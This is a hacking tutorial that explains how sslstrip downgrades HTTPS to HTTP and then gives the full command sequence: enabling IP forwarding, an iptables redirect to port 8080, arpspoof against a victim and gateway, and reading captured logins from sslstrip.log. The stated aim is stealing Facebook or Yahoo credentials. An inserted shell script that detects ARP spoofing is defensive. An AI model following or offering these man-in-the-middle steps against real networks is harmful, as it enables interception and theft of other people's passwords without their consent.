What is Sslstrip
Sslstrip is a man-in-the-middle attack tool. It is used to capture usernames and passwords sent over the secure protocol [HTTPS]. Sslstrip allows attackers to convert HTTPS traffic into HTTP. HTTP and HTTPS are the protocols that browsers use to communicate with websites. The only difference between HTTP and HTTPS is that HTTPS is secured: it uses encryption, so any information sent over HTTPS cannot be read if it is captured. Sslstrip manipulates the internet traffic and converts HTTPS traffic into HTTP; in this way we can steal credentials [username and password] and read them in plain text.
How does sslstrip work
I am assuming that the attacker has already started sslstrip and arpspoof. For now, forget about arpspoof; we will cover it later in the tutorial.
Step 1 :
First, the victim opens his web browser and attempts to open a website via an HTTPS connection. With the help of arpspoof, the router forwards that request to the attacker.
Step 2 :
Once the router forwards the request to the attacker, the attacker passes it through Sslstrip, which converts HTTPS to HTTP. After passing the request through Sslstrip, the attacker sends it back to the router.
Step 3 :
The attacker sends the request back to the router, and from there it goes on to the website. When the website responds, the victim ends up connected via HTTP. This is the first part: we have forced the victim to connect via HTTP.
Now when the victim logs in to any website like Facebook or Yahoo and presses the login button, the username and password are sent to the router, and arpspoof forwards that information to the attacker. The attacker passes it through Sslstrip, which logs the information and sends it on to the website, and the website processes the login information.
Now that we have a basic understanding of how sslstrip works, we are ready to do it practically.
The first thing you need is to connect to the same network as the victim and open your terminal. Make a note of your network interface. If you are connected to the internet via wifi, it should be wlan0; if wired (ethernet), then eth0.
Enable IP forwarding
Now we need to enable IP forwarding so our computer can route traffic. Type the following command in your terminal.
root@seven:~# echo 1 > /proc/sys/net/ipv4/ip_forward
Now we have to configure iptables to redirect the traffic. The default port number assigned to a web server is 80. For experiments, 8080 is an alternative to port 80, so we will redirect traffic to port 8080. Type or copy the following command in your terminal and hit enter.
root@seven:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Find gateway IP address
The gateway address is also known as the router's address. We need to find the address of the router that we are connected to. Type the following command and make a note of your gateway address.
root@seven:~# route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
0.0.0.0         192.168.150.2   0.0.0.0         UG    1024   0        0 eth0
192.168.150.0   0.0.0.0         255.255.255.0   U     0      0        0 eth0
Once you have your target we are ready to move forward.
Now we need to start arpspoof to redirect the HTTP traffic to our computer. Type the following command in your terminal. Make a note of the interface: I am connected to the internet via ethernet, so my interface is eth0; if you are connected via wifi, enter wlan0.
root@seven:~# arpspoof -i eth0 -t 192.168.150.128 -r 192.168.150.2
Arpspoof needs 3 arguments: the network interface, the router's address and the victim's IP address.
-i is for the interface, -t is for the target [victim's IP address] and -r is for your router's address.
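Seen from the defending side, this ARP redirection leaves a trace in the victim's ARP cache: when the cache also holds the attacker's own IP, the router's IP and that host resolve to the same MAC address. The script below is an added example, not part of the original tutorial, that checks a table in /proc/net/arp format for that condition. The sample table is constructed: the MAC addresses and the hosts other than 192.168.150.2 are made up, and the function names are hypothetical.

```shell
#!/bin/sh
# Added example: flag IPv4 neighbours that share one MAC address, the
# trace ARP spoofing can leave in a victim's ARP cache.

# Constructed sample in /proc/net/arp format. 192.168.150.2 is the gateway
# from the tutorial's lab; the other hosts and all MAC values are made up.
sample_arp_table() {
cat <<'EOF'
IP address       HW type     Flags       HW address            Mask     Device
192.168.150.2    0x1         0x2         00:0c:29:aa:bb:cc     *        eth0
192.168.150.129  0x1         0x2         00:0c:29:aa:bb:cc     *        eth0
192.168.150.1    0x1         0x2         00:50:56:c0:00:08     *        eth0
192.168.150.254  0x1         0x0         00:00:00:00:00:00     *        eth0
EOF
}

# Reads an ARP table on stdin and prints "MAC ip1 ip2 ..." for every MAC
# claimed by more than one IP. Incomplete entries (all-zero MAC) are skipped.
find_shared_macs() {
    awk 'NR > 1 && $4 != "00:00:00:00:00:00" {
             mac = tolower($4)
             if (mac in ips) ips[mac] = ips[mac] " " $1
             else            ips[mac] = $1
             count[mac]++
         }
         END {
             for (mac in count)
                 if (count[mac] > 1) print mac, ips[mac]
         }'
}

# Reads an ARP table on stdin. Returns 0 (suspicious) when the gateway IP
# given as $1 shares its MAC with another host, 1 otherwise.
gateway_is_shadowed() {
    find_shared_macs | awk -v gw="$1" '
        { for (i = 2; i <= NF; i++) if ($i == gw) found = 1 }
        END { exit(found ? 0 : 1) }'
}
```

On a live Linux host the same check is `gateway_is_shadowed 192.168.150.2 < /proc/net/arp`, with the gateway address taken from `route -n`.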
Open another terminal; we need to start sslstrip.
root@seven:~# sslstrip -l 8080
Once you have started sslstrip, when your victim logs in to Facebook, Yahoo or any other website, we will receive the username and password in the log file. The username and password will not be displayed in the terminal, so you need to open the sslstrip.log file.
Open sslstrip.log file
The username and password will be stored inside the sslstrip.log file in the home directory. Navigate to your home directory and check the sslstrip.log file. Type the following command.
root@seven:~# cat sslstrip.log